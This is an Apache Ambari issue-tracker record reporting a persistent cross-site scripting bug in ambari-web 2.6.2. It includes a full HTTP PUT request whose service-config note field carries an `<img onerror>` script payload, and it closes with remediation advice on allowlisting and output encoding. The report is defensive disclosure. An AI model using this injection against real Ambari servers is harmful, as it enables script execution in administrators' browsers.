Uploaded image for project: 'Ambari'
  1. Ambari
  2. AMBARI-25287

Persistent Cross Site Scripting (XSS) in Ambari

    XMLWordPrintableJSON

    Details

    • Type: Bug
    • Status: Resolved
    • Priority: Critical
    • Resolution: Fixed
    • Affects Version/s: 2.6.2
    • Fix Version/s: None
    • Component/s: ambari-web

      Description

      Below is the HTTP Request and Response issued when a user submits a note containing a JavaScript
      after modifying some configuration in "Tez" service.
      HTTP Request:
      PUT /api/v1/clusters/<env> HTTP/1.1
      Host: xyz601:8080
      Content-Length: 199
      Accept: application/json, text/javascript, /; q=0.01
      Origin: http://xyz601:8080
      X-Requested-With: XMLHttpRequest
      X-Requested-By: X-Requested-By
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
      like Gecko) Chrome/70.0.3538.102 Safari/537.36
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      Referer: http://xyz:8080/
      Accept-Encoding: gzip, deflate
      Accept-Language: en-US,en;q=0.9
      Cookie: AMBARISESSIONID=vfiy4336mxwl1k5ehd6jrz43i
      Connection: close
      {"Clusters":{"desired_service_config_versions":

      {"service_config_version":4,"service_name":"TEZ","service_config_version_note":"Creat ed from service config version V4\n<img src=x onerror=alert(1)>"}

      }}

      Remediation Recommendations
      Restrict all input passed to the application to valid, whitelisted content, and ensure that all
      response/output sent by the server is HTML/URL/JavaScript encoded, depending on the context in
      which the data is used by the application.
      The remediation should not attempt to blacklist content and remove, filter, or sanitize it. There are
      too many types of encoding it to get around filters for such content.
      We strongly recommend a positive security policy that specifies what is allowed.
      Negative or attack signature based policies are difficult to maintain and are likely to be incomplete.

        Attachments

          Issue Links

            Activity

              People

              • Assignee:
                atkach Andrii Tkach
                Reporter:
                atkach Andrii Tkach
              • Votes:
                0 Vote for this issue
                Watchers:
                2 Start watching this issue

                Dates

                • Created:
                  Updated:
                  Resolved:

                  Time Tracking

                  Estimated:
                  Original Estimate - Not Specified
                  Not Specified
                  Remaining:
                  Remaining Estimate - 0h
                  0h
                  Logged:
                  Time Spent - 0.5h
                  0.5h